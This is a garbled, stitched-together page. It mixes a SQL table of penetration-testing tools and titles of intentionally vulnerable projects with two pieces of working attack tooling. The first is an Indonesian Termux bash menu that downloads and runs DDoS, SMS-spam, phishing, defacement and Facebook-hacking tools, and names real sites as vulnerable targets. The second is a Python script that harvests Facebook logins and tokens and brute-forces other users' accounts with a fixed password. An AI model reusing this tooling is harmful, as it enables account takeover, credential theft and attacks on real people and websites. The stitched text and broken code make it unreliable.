Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
pwk4m1 / Damn Vulnerable Device DriverDamn vulnerable linux device driver for people to play with.
0xbigshaq / Luajit PwnVuln-dev environment for LuaJIT
kasif-dekel / OSR DeviceTree VulnNo description available
Dzxmzstrt / Bucin.sh#! cd /data/data/com.termux/files/usr/bin/bash clear cd data clear echo "Ngapain Ke Sini? siap Siap Ngebucin Ya!" | lolcat echo "Jawab:" ;read {$} clear figlet Mr.BalBaL.X | lolcat echo "================| Tools Bucin Gan:v | ===============" | lolcat echo"" echo"" figlet InstallerV5 echo " _______________________ " | lolcat echo "_________| Tools Installer V.5 |___________" | lolcat echo "|________|_____________________|__________|" | lolcat echo "|__| Thanks To 28 Black Hat Cyber Team |__|" | lolcat echo "|__|===================================|__|" | lolcat echo "|__| •Bucin Area😂• |__|" | lolcat echo "|__|===================================|__|" | lolcat echo "|_________| Author: Mr.B41B4L.X |_________|" | lolcat echo " |_____________________| " | lolcat echo "" echo "" echo "===========================================" | lolcat echo " Daftar Tools Yang Tersedia Synk " | lolcat echo "===========================================" | lolcat ################################################### # CTRL + C ################################################### trap ctrl_c INT ctrl_c() { clear echo $" kok keluar?,Kmu Mau Kmn Cintaku..Kok Buru Buru Banget Sih😢" | lolcat echo "" echo $" Byee,see you Yank❤..." | lolcat sleep 1 exit } lagi=1 while [ $lagi -lt 6 ]; do echo "" echo "" echo $"1. Nmap"; echo "=============================" | lolcat echo $"2. Admin-finder"; echo "=============================" | lolcat echo $"3. RED_HAWK"; echo "=============================" | lolcat echo $"4 Lazymux"; echo "=============================" | lolcat echo $"5. Tools-X"; echo "=============================" | lolcat echo $"6. LITESPAM Buat Spam Hati Dia"; echo "=============================" | lolcat echo $"7. LITEDDOS Buat Melumpuhkan Hati Dia"; echo "=============================" | lolcat echo $"8. HACK Facebook"; echo "=============================" | lolcat echo $"9. ToolsBAJINGANv6"; echo "=============================" | lolcat echo $"10. ToolsTU4N B4DUT"; echo "============================" | lolcat echo $"11. spamSms"; echo "============================" | lolcat echo $"12. Tools Striker"; echo "============================" | lolcat echo $"13. generate KTP/KK Untuk Menikahi Dia"; echo "=============================" | lolcat echo $"14. Tools Mr.Cakil"; echo "=============================" | lolcat echo $"15. Tools santetOnline"; echo "=============================" | lolcat echo $"16. Script Deface Creator"; echo "=============================" | lolcat echo $"17. Install Tools Crew-Bot"; echo "=============================" | lolcat echo $"18. Install Katoolin"; echo "=============================" | lolcat echo $"19. Tools Mr.Rv1.1"; echo "=============================" | lolcat echo $"20. Bermain Game Di Termux"; echo "=============================" | lolcat echo $"21. Nuyul Kubik"; echo "=============================" | lolcat echo $"22. Perkiraan Cuaca Kota Bekasi"; echo "=============================" | lolcat echo $"23. Animasi Keteta"; echo "=============================" | lolcat echo $"24. Menampilkan Informasi android"; echo "=============================" | lolcat echo $"25. Web Phising Creator"; echo "=============================" | lolcat echo $"26. Tools Hek Bank :v"; echo "=============================" | lolcat echo $"27. Spam SMS Jdid"; echo "=============================" | lolcat echo $"28. Kubik Bot"; echo "=============================" | lolcat echo $"29. Kumpulan Web VULN"; echo "=============================" | lolcat echo $"30. Bot Komentar FB"; echo "=============================" | lolcat echo $"31. Kumpulan Status Bucin:v"; echo "=============================" | lolcat echo $"32. Weeman"; echo "=============================" | lolcat echo $"33. metasploit"; echo "=============================" | lolcat echo $"34. OSIF BOT"; echo "=============================" | lolcat echo $"35. Scanner-INURLBR"; echo "=============================" | lolcat echo $"00. Exit"; echo "" echo -e "╭─Pilih Dong Sayank>" |lolcat read -p "╰─#" pil; # Nmap case $pil in 1) pkg install nmap echo -e "${y} {1} Masukkan Web${endc}:" read web nmap $web echo$ ;; # admin-finder 2) git clone https://github.com/the-c0d3r/admin-finder.git echo -e "${y} cara menggunakan admin finder" echo -e "${y} cd admin-finder" echo -e "${y} python admin-finder.py" cd /data/data/com.termux/files/home/admin-finder/ python2 /data/data/com.termux/files/home/admin-finder/admin-finder.py echo ;; #RED_HAWK 3) git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e "${y} Installer RED_HAWK..." echo -e "${y} cd RED_HAWK" echo -e "${y} php RED_HAWK.php" cd /data/data/com.termux/files/home/RED_HAWK/ php /data/data/com.termux/files/home/RED_HAWK/ RED_HAWK.php ;; #Lazymux 4) git clone https://github.com/Gameye98/Lazymux echo -e "${y} Installer Lazymux..." echo -e "${y} cd Lazymux" echo -e "${y} python lazymux.py" cd /data/data/com.termux/files/home/Lazymux/ python2 /data/data/com.termux/files/home/Lazymux/ lazymux.py ;; #Tools-X 5) git clone https://github.com/Rajkumrdusad/Tool-X echo -e "${y} Installer Tool-X..." echo -e "${y} cd Tool-X" echo -e "${y} sh install.aex" cd /data/data/com.termux/files/home/Tool-X bash /data/data/com.termux/files/home/Tool-X/sh install.aex ;; #LITESPAM 6) git clone https://github.com/4L13199/LITESPAM cd LITESPAM sh LITESPAM.sh cd /data/data/com.termux/files/home/LITESPAM bash /data/data/com.termux/files/home/LITESPAM/LITESPAM.sh ;; #LITEDDOS 7) git clone https://github.com/4L13199/LITEDDOS cd LITEDDOS python2 LITEDDOS.py cd /data/data/com.termux/files/home/LITEDDOS python2 /data/data/com.termux/files/home/LITEDDOS/ LITEDDOS.py ;; #HACKFB 8)git clone https://github.com/hnov7/mbf cd mbf pip2 install mechanize python2 mbf.py cd /data/data/com.termux/files/home/mbf python2 /data/data/com.termux/files/home/mbf/mbf.py ;; #ToolsBAJINGANv6 9) git clone https://github.com/DarknessCyberTeam/BAJINGANv6 cd BAJINGANv6 sh BAJINGAN.sh cd /data/data/com.termux/files/home/BAJINGANv6 bash /data/data/com.termux/files/home/BAJINGANv6/BAJINGAN.sh ;; #Tools TU4N B4DUT 10) git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv3 cd TOOLSINSTALLERv3 chmod +x TUANB4DUT.sh sh TUANB4DUT.sh cd /data/data/com.termux/files/home/TUANB4DUT bash /data/data/com.termux/files/home/TUANB4DUT/TUANB4DUT.sh ;; #SpamSMS 11) git clone https://github.com/joss24242/SpamSms cd SpamSms python2 mantan.py cd /data/data/com.termux/files/home/SpamSms python2 /data/data/com.termux/files/home/SpamSms/mantan.py ;; #Tools Striker 12) git clone https://github.com/UltimateHackers/Striker cd Striker pip2 install -r requirements.txt python2 striker.py cd /data/data/com.termux/files/home/Striker python2 /data/data/com.termux/files/home/Striker/striker.py ;; #GENERATE KTP/KK 13) git clone https://github.com/zerosvn/ktpkkgenerate cd ktpkkgenerate php zerosvn.php cd /data/data/com.termux/files/home/ktpkkgenerate php /data/data/com.termux/files/home/ktpkkgenerate/zerosvn.php ;; #Tools Mr.Cakil 14) git clone https://github.com/mrcakil/Mrcakil.git cd Mrcakil chmod +x tools ./tools cd /data/data/com.termux/files/home/Mrcakil bash /data/data/com.termux/files/home/Mrcakil/tools.sh ;; #Tools Santet Online 15) git clone https://github.com/Gameye98/santet-online cd santet-online python2 santet.py cd /data/data/com.termux/files/home/santet-online python2 /data/data/com.termux/files/home/santet-online/santet.py ;; #ScDefaceCreator 16) git clone https://github.com/Ubaii/script-deface-creator cd script-deface-creator chmod +x create.py python2 create.py cd /data/data/com.termux/files/home/script-deface-creator python2 /data/data/com.termux/files/home/script-deface-creator/create.py ;; #ToolsCrewBot 17) git clone https://github.com/Xeit666h05t/CrewBot cd CrewBot python2 CrewBot.pyc cd /data/data/com.termux/files/home/Crew-Bot python2 /data/data/com.termux/files/home/Crew-Bot/ Crew-Bot.pyc ;; #Katoolin 18) pkg install gnupg git clone https://github.com/LionSec/katoolin.git cd katoolin python2 katoolin.py nano katoolin.py cd /data/data/com.termux/files/home/Crew-Bot python2 /data/data/com.termux/files/home/script-deface-creator/ Crew-Bot.pyc ;; #tool Mr.Rv1.1 19) pkg install gem pkg install figlet gem install lolcat git clone https://github.com/Mr-R225/Mr.Rv1.1 cd Mr.Rv1.1, sh Mr.Rv1.1.sh cd /data/data/com.termux/files/home/Mr.Rv1.1 bash /data/data/com.termux/files/home/Mr.Rv1.1/ Mr.Rv1.1.sh ;; #BermainGame 20) pkg install moon-buggy moon-buggy ;; #Nuyul Kubik 21) pkg install php pkg install nano git clone https://github.com/adidoank/kubik cd kubik nano cfg.php cd /data/data/com.termux/files/home/kubik php /data/data/com.termux/files/home/kubik/ cfg.php ;; #Perkiraan Cuaca Kota Bekasi Dan Sekitarnya 22) pkg install curl curl http://wttr.in/bekasi exit ;; #Menampilkan Animasi Kereta 23) pkg install sl sl ;; #menampilkan ikon informasi android 24) pkg install neofetch neofetch ;; #Web Phising 25) apt install apache2 apt install php apt install git git clone https://github.com/Senitopeng/PhisingGame.git cd PhisingGame python2 phising.py cd /data/data/com.termux/files/home/PhisingGame python2 /data/data/com.termux/files/home/PhisingGame/ phising.php ;; #Hek Bank :v 26) apt install python2-dev apt install wget pip2 install mechanize git clone https://github.com/NurmalaCruzz/Hackbank.git cd Hackbank chmod +x nur.sh sh nur.sh cd /data/data/com.termux/files/home/Hackbank bash /data/data/com.termux/files/home/kubik/ nur.sh ;; #SpamJdid 27) pkg install php pkg install curl curl https://pastebin.com/raw/9BYy1JVc -o jdid.php ls php jdid.php cd /data/data/com.termux/files/home/jdid php /data/data/com.termux/files/home/jdid/ jdid.php ;; #Kubik Bot 28) git clone https://github.com/radenvodka/kubik-bot cd kubik-bot pkg install nano nano kubik.php cd /data/data/com.termux/files/home/kubik-bot php /data/data/com.termux/files/home/kubik-bot/ kubik.php ;; #Web VULN 29) clear echo " Kumpulan Web VULN Webdav " | lolcat echo "http://www.zambianacmisonline.org http://ticketexchange.co.il https://res.torontocentre.org http://m.nysdrillteams.com https://nnpessoa.com.br/site https://www.larimerhumane.org" ;; #Bot Komen FB 30) clear pip2 install mechanize git clone https://github.com/Senitopeng/Botkomena.git cd Botkomena python2 botkomena.py ;; 31) clear figlet "Alay Lu" | lolcat ;; #Weeman 32) clear apt-get update apt-get upgrade pkg install python2 pkg install git git clone https://github.com/evait-security/weeman.git ls cd weeman python2 weeman.py ;; #metasploit 33) clear pkg update && pkg upgrade pkg install curl pkg install python pkg install python2 curl -LO https://raw.githubusercontent.com/Techzindia/Metasploit_For_Termux/master/metasploitTechzindia.sh chmod 777 metasploitTechzindia.sh ./metasploitTechzindia.sh cd metasploit-framework ./msfconsole ;; #BOT OSIF 34) clear pip2 install requests mechanize apt install git git clone $https://github.com/CiKu370/OSIF.git cd OSIF pip2 install -r requirements.txt python2 osif.py ;; #Scanner-INURLBR 35) clear pkg install PHP git clone https://github.com/googleinurl/SCANNER-INURLBR.git cd SCANNER-INURLBR php inurlbr.php ;; 00) clear echo "Kok Keluar? Mau Kemana Cintaku..Kan Kita Baru Ketemu😢" | lolcat echo " Byee Synk❤" | lolcat exit ;; *) echo " CARI YANG ADA AJA KIMAK!! " | lolcat esac done done
Commando-X / Vuln Bank DevsecopsUsing the Vulnerable Bank App project to teach Engineers how to automate security testing of vulnerable applications in the CI/CD Pipeline.
asecurityguru / Devsecops Gitlab Java Vulnerable ApplicationNo description available
amalrajpc / Android Device VulnerabilityDevice allow remote code execution because there is an adb open port with root permission
ku-leuven-msec / Damn Vulnerable Device SeminarVulnerable services
digitalmubashir / IoT Vuln Scanner DeviceThe goal of this project is to put a vulnerability scanner on a Raspberry Pi which will have the ability to scan your internal network and inform you of potential security issues on your network.
kingdaryas7 / Dara.py#!/usr/bin/python2 #coding=utf-8 #The Credit For This Code Goes To lovehacker #If You Wanna Take Credits For This Code, Please Look Yourself Again... #Reserved2020 import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print "\x1b[1;91mExit" os.sys.exit() def acak(b): w = 'ahtdzjc' d = '' for i in x: d += '!'+w[random.randint(0,len(w)-1)]+i return cetak(d) def cetak(b): w = 'ahtdzjc' for i in w: j = w.index(i) x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j)) x += '\033[0m' x = x.replace('!0','\033[0m') sys.stdout.write(x+'\n') def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.07) #Dev:love_hacker ##### LOGO ##### logo = """ \033[1;91m:▒▒▒▒███▒███▒███▒███▒▒▒▒▒▒▒▒▒▒: \033[1;92m▒▒▒▒▒▒▒▒█▒█▒█▒▒▒█▒█▒█▒▒▒▒▒▒▒▒▒▒:: \033[1;93m:▒▒▒▒▒▒███▒█▒█▒███▒█▒█▒▒▒▒▒▒▒▒▒▒::: \033[1;94m::▒▒▒▒▒▒█▒▒▒█▒█▒█▒▒▒█▒█▒▒▒▒▒▒▒▒▒▒:::: \033[1;95m:::▒▒▒▒▒▒███▒███▒███▒███▒▒▒▒▒▒▒▒▒▒::::: \033[1;96m::♧♧♧♧♧♧♧♧♧♧\033[1;91mWhatsapp\033[1;96m♧♧♧♧♧♧♧♧♧♧▒▒▒▒▒▒▒:::: \033[1;91m:》》》\033[1;93m+923094161457\033[1;91m《《《▒▒▒▒▒▒▒▒▒▒▒::::: \033[1;95m♡╭──────────•◈•──────────╮♡\033[1;96m-dara.russ-\033[1;95m♡╭──────────•◈•──────────╮♡ \033[1;92m..........................dara.russ...................... \033[1;93m╔╗ ╔╗╔═╦╦╦═╗ ╔╗╔╦═╦╦╗ \033[1;93m║║ ║╚╣║║║║╩╣ ╚╗╔╣║║║║ Pakistan \033[1;93m╚╝ ╚═╩═╩═╩═╝═ ╚╝╚═╩═╝ \033[1;95m♡╰──────────•◈•──────────╯♡\033[1;96mBlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡""" def tik(): titik = ['. ','.. ','... '] for o in titik: print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1) back = 0 berhasil = [] cekpoint = [] oks = [] id = [] listgrup = [] vulnot = "\033[31mNot Vuln" vuln = "\033[32mVuln" os.system("clear") print """ \033[1;96m-┈┈┈┈┈┈┈┈┈┈┈╱▔▔▔▔╲┈┈┈┈┈┈┈┈ \033[1;96m┈┈┈┈┈┈┈┈┈┈┈▕▕╲┊┊╱▏▏┈┈┈┈┈┈┈ \033[1;96m┈┈┈┈┈┈┈┈┈┈┈▕▕▂╱╲▂▏▏┈┈┈┈┈┈┈ \033[1;96m ┈┈┈┈┈┈┈┈┈┈┈┈╲┊┊┊┊╱┈┈┈┈┈┈┈┈ \033[1;96m ┈┈┈┈┈┈┈┈┈┈┈┈▕╲▂▂╱▏┈┈┈┈┈┈┈┈ \033[1;96m ┈┈┈┈┈┈┈┈╱▔▔▔▔┊┊┊┊▔▔▔▔╲┈┈┈┈ \033[1;96m ─────────────•◈•────────── \033[1;92m███████▒▒Welcome To dara.russ▒▒████████ \033[1;95m♡╭──────────•◈•──────────╮♡\033[1;96mBlackMafia\033[1;95m♡╭──────────•◈•──────────╮♡ \033[1;94mAuthor\033[1;91m: \033[1;91mlovehacker \033[1;94mBlackMafia\033[1;91m: \033[1;91▒▓██████████████]99.9 \033[1;94mFacebook\033[1;91m: \033[1;91mlovehacker \033[1;94mWhatsapp\033[1;91m: \033[1;91m+923094161457 \033[1;95m♡╰──────────•◈•──────────╯♡\033[1;96mBlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡""" jalan(' \033[1;96m....................dara.russ.....................:') jalan("\033[1;93m ┈┈┈┈┈┈┈┈╱▔▔▔▔╲┈┈┈┈┈┈┈┈ ") jalan('\033[1;93m ┈┈┈┈┈┈┈▕▕╲┊┊╱▏▏┈┈┈┈┈┈┈ ') jalan('\033[1;93m ┈┈┈┈┈┈┈▕▕▂╱╲▂▏▏┈┈┈┈┈┈┈ ') jalan("\033[1;93m ┈┈┈┈┈┈┈┈╲┊┊┊┊╱┈┈┈┈┈┈┈┈ ") jalan("\033[1;93m ┈┈┈┈┈┈┈┈▕╲▂▂╱▏┈┈┈┈┈┈┈┈") print "\033[1;93m♡─────╱▔▔▔▔┊┊┊┊▔▔▔▔╲───────♡\033[1;96mLogin BlackMafia\033[1;95m♡╰──────────•◈•──────────╯♡" CorrectUsername = "dara russ" CorrectPassword = "darahacker" loop = 'true' while (loop == 'true'): username = raw_input("\033[1;91m🔐 \x1b[1;91mTool Username \x1b[1;91m»» \x1b[1;93m") if (username == CorrectUsername): password = raw_input("\033[1;94m🔐 \x1b[1;91mTool Password \x1b[1;91m»» \x1b[1;92m") if (password == CorrectPassword): print "Logged in successfully as " + username #Dev:love_hacker time.sleep(2) loop = 'false' else: print "\033[1;91mWrong Password" os.system('xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw') else: print "\033[1;94mWrong Username" os.system('xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw') def login(): os.system('clear') try: toket = open('login.txt','r') menu() except (KeyError,IOError): os.system('clear') print logo jalan(' \033[1;92mWarning: \033[1;97mDo Not Use Your Personal Account' ) jalan(' \033[1;92m Note: \033[1;97mUse a New Account To Login' ) print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡" print(' \033[1;94m♡\x1b[1;91m》》》》》》LOGIN WITH FACEBOOK《《《《《《\x1b[1;94m♡' ) print(' ' ) id = raw_input('\033[1;96m[+] \x1b[1;92mID/Email\x1b[1;95m: \x1b[1;96m') pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword\x1b[1;96m: \x1b[1;96m') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print"\n\x1b[1;96mThere is no internet connection" keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"} x=hashlib.new("md5") x.update(sig) a=x.hexdigest() data.update({'sig':a}) url = "https://api.facebook.com/restserver.php" r=requests.get(url,params=data) z=json.loads(r.text) unikers = open("login.txt", 'w') unikers.write(z['access_token']) unikers.close() print '\n\x1b[1;95mLogin Successful...' os.system('xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw') requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token']) menu() except requests.exceptions.ConnectionError: print"\n\x1b[1;91mThere is no internet connection" keluar() if 'checkpoint' in url: print("\n\x1b[1;92mYour Account is on Checkpoint") os.system('rm -rf login.txt') time.sleep(1) keluar() else: print("\n\x1b[1;93mPassword/Email is wrong") os.system('rm -rf login.txt') time.sleep(1) login() def menu(): os.system('clear') try: toket=open('login.txt','r').read() except IOError: os.system('clear') print"\x1b[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) login() try: otw = requests.get('https://graph.facebook.com/me?access_token='+toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] except KeyError: os.system('clear') print"\033[1;91mYour Account is on Checkpoint" os.system('rm -rf login.txt') time.sleep(1) login() except requests.exceptions.ConnectionError: print"\x1b[1;92mThere is no internet connection" keluar() os.system("clear") #Dev:love_hacker print logo print " \033[1;95m«-----♡----\033[1;93mLogged in User Info\033[1;95m----♡-----»" print " \033[1;94m Name\033[1;93m:\033[1;92m"+nama+"\033[1;97m " print " \033[1;97m ID\033[1;93m:\033[1;92m"+id+"\x1b[1;97m " print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡" print "\033[1;97m--\033[1;92m> \033[1;92m1.\x1b[1;92mStart Cloning..." print "\033[1;97m--\033[1;91m> \033[1;91m0.\033[1;91mExit " pilih() def pilih(): unikers = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m") if unikers =="": print "\x1b[1;91mFill in correctly" pilih() elif unikers =="1": super() elif unikers =="0": jalan('Token Removed') os.system('rm -rf login.txt') keluar() else: print "\x1b[1;91mFill in correctly" pilih() def super(): global toket os.system('clear') try: toket=open('login.txt','r').read() except IOError: print"\x1b[1;91mToken invalid" os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print "\033[1;96m--\033[1;92m> \033[1;92m1.\x1b[1;91mClone From Friend List..." print "\033[1;96m--\033[1;92m> \033[1;92m2.\x1b[1;91mClone From Public ID..." print "\033[1;96m--\033[1;91m> \033[1;91m0.\033[1;94mBack" pilih_super() def pilih_super(): peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m") if peak =="": print "\x1b[1;91mFill in correctly" pilih_super() elif peak =="1": os.system('clear') print logo print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡" jalan('\033[1;93mGetting IDs \033[1;97m...') r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) elif peak =="2": os.system('clear') print logo idt = raw_input("\033[1;96m[♡] \033[1;92mEnter ID\033[1;93m: \033[1;97m") print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────╯♡" try: jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket) op = json.loads(jok.text) print"\033[1;93mName\033[1;93m:\033[1;97m "+op["name"] except KeyError: print"\x1b[1;92mID Not Found!" raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]") super() print"\033[1;93mGetting IDs\033[1;93m..." r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket) z = json.loads(r.text) for i in z['data']: id.append(i['id']) elif peak =="0": menu() else: print "\x1b[1;91mFill in correctly" pilih_super() print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m"+str(len(id)) jalan('\033[1;92mPlease Wait\033[1;93m...') titik = ['. ','.. ','... '] for o in titik: print("\r\033[1;91mCloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1) print "\n\033[1;94m«-----\x1b[1;93m♡To Stop Process Press CTRL+Z♡\033[1;94m----»" print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡" jalan(' \033[1;93m ........Cloning Start plzzz Wait.......... ') print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mBlackMafia\033[1;95m♡──────────•◈•──────────♡" def main(arg): global cekpoint,oks user = arg try: os.mkdir('out') except OSError: pass #Dev:love_hacker try: a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket) b = json.loads(a.text) pass1 = ('786786') data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;92m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1 oks.append(user+pass1) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1 cek = open("out/checkpoint.txt", "a") cek.write(user+"|"+pass1+"\n") 